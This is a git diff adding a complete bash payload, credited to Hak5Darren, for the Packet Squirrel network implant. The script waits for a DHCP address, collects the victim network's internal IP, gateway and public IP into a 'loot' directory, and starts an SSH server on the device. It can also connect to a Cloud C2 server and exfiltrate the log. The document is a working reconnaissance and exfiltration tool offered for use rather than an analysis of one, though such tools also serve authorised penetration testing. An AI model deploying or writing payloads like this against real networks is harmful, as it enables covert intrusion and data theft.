diff --git a/payloads/library/recon/ipinfo/payload.txt b/payloads/library/recon/ipinfo/payload.txt new file mode 100644 index 0000000..b7517fe --- /dev/null +++ b/payloads/library/recon/ipinfo/payload.txt @@ -0,0 +1,61 @@ +#!/bin/bash +# +# Title: IP Info +# Author: Hak5Darren +# Version: 1.0 +# +# Description: This payload gathers internal and external IP address info, +# including default gateway, saving the log to the loot directory and +# optionally exfiltrating the log to Cloud C2 if CLOUDC2=1 +# +# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP +# LED ATTACK (Yellow Blink)... Saving IP address information +# LED FAIL (Red Blink)... Failed to gather public IP address +# LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2 +# LED FINISH (Green Fast Blink to Solid)... Payload successful + +CLOUDC2=0 + +# Save to /root/ for internal memory +#LOOT_DIR=/root/loot/ipinfo +# Save to /mnt/ for USB drive +LOOT_DIR=/mnt/loot/ipinfo +PUBLIC_IP_URL="http://ipinfo.io/ip" + +function FAIL() { LED FAIL; exit; } +LED SETUP + +# Make log file +mkdir -p $LOOT_DIR +LOG_FILE="ipinfo_$(find $LOOT_DIR -type f | wc -l).log" +LOG="$LOOT_DIR/$LOG_FILE" + +# Optionally start SSH server +/etc/init.d/sshd start + + +# Ask for IP address +NETMODE NAT + +# Wait until Packet Squirrel has an IP address +while ! ifconfig eth1 | grep "inet addr"; do sleep 1; done + +LED ATTACK +# Gather IP info and save log +INTERNALIP=$(ifconfig eth1 | grep "inet addr" | awk {'print $2'} | awk -F: {'print $2'}) +GATEWAY=$(route | grep default | awk {'print $2'}) +PUBLICIP=$(wget --timeout=30 $PUBLIC_IP_URL -qO -) || FAIL +echo -e "Date: $(date)\n\ +Internal IP Address: $INTERNALIP\n\ +Public IP Address: $PUBLICIP\n\ +Gateway: $GATEWAY\n" >> $LOG + +# Optionally connect to Cloud C2, wait for connection and exfiltrate loot +if [ "$CLOUDC2" = "1" ]; then + LED SPECIAL + C2CONNECT + while ! pgrep cc-client; do sleep 1; done + C2EXFIL STRING $LOG IPinfo +fi + +LED FINISH